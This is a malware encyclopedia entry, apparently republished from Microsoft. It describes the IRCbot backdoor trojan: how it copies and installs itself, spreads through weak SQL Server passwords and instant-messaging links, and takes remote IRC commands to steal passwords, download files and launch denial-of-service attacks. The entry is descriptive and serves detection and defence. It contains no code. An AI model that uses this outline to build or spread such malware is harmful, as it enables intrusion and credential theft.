Home / malwarePDF  

Backdoor:Win32/IRCbot.gen!M


First posted on 14 August 2019.
Source: Microsoft

Aliases :

There are no other names known for Backdoor:Win32/IRCbot.gen!M.

Explanation :

Backdoor:Win32/IRCbot.gen!M is a generic detection for a backdoor trojan that allows unauthorized access and control of an affected computer. It connects to a remote IRC server in order to receive commands from an attacker.Installation When executed the malware usually copies itself to another location. The filename used by the malware is variable, for example we observed the malware copying itself to the following locations:   dllcacheisass.exe dllcachewinmdfy.exe dllcacheqxchost.exe   Backdoor:Win32/IRCbot.gen!M then executes that copy and may drop and execute a batch file that deletes its original executable.  Note that the malware may also modify the system to run itself as a service.Spreads via Exploit Backdoor:Win32/IRCbot.gen!M may attempt to spread by exploiting particular vulnerabilities in remote computers.   Weak passwords The malware contains a list of weak passwords that it uses in order to attempt to get access to administrator accounts on a remote computers running SQL Server.   Instant Messaging The malware checks if the following Instant Messaging clients are running: MSN Messenger ICQ Yahoo Messenger    If found the malware then clicks the relevant buttons to send links of itself to entries in the contact list. Note that the link that is sent is provided via a backdoor command.Payload Allows backdoor access and control When executed the malware connects to a remote IRC server and joins a particular channel in order to receive commands from a remote attacker. The remote attacker can command the malware to perform a list of tasks such as the following: Connect to a different IRC server or channel Steal passwords from protected storage  Start / stop spreading via exploit and weak passwords Start / stop spreading via Instant Messaging  Provide statistics on the number of successfully exploited hosts Download and execute arbitrary files Update to a new copy of the malware Uninstall itself Perform a Denial of Service attack on a remote host Run a SOCKS4 proxy on an infected machine Stop the currently executing malware process   Analysis by Ray Roberts

Last update 14 August 2019

 

TOP